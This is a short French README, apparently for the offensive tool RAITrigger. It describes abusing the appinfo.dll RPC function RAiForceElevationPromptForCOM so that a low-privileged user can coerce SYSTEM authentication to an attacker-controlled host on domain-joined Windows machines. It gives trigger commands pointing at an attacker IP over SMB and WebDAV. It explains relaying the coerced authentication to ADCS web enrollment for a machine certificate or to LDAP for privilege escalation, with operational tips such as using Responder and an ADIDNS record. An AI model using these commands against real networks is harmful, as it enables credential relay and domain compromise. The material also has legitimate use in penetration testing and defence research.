
Local SYSTEM auth trigger for relaying
La fonction RPC RAiForceElevationPromptForCOM de la bibliothèque appinfo.dll permet une contrainte SYSTEM. Cela ne fonctionne que sur les systèmes joints à un domaine. Il s'avère que cette fonction peut être appelée par tout utilisateur à faibles privilèges (non pas pour lancer un processus) mais pour déclencher une authentification SYSTEM vers un emplacement arbitraire. Cela est dû au fait que CreateFileW est appelée en tant que SYSTEM vers l'emplacement du premier paramètre d'entrée :
Comme l'utilisateur à faibles privilèges est toujours impersonné, cela ne peut pas être utilisé comme déclencheur Potato pour élever les privilèges de SEImpersonate à SYSTEM :
Mais cela peut être utilisé pour demander un certificat de compte machine auprès d'ADCS lorsque l'inscription web est activée avec l'authentification SMB entrante. Ou cela peut être utilisé pour une LPE avec relais vers LDAP - lorsque la signature LDAP n'est pas activée.
Pour déclencher l'authentification SMB :
[*] RAITrigger.exe \\attackerip\test\test.exe
Pour déclencher l'authentification HTTP (le service WebClient doit être activé) :
[*] RAITrigger.exe \\hostname@80\test\test.exe
L'authentification HTTP n'est déclenchée que vers les systèmes de la zone intranet de confiance, vous devrez donc créer un enregistrement ADIDNS pour votre IP Kali ou être dans le même sous-réseau et utiliser par ex. Responder. N'utilisez jamais le FQDN complet, seulement le nom d'hôte.
Appeler cette fonction à distance (même avec un administrateur local) conduit à rpc_access_denied, ce n'est donc pas une alternative à par ex. PetitPotam ou similaire :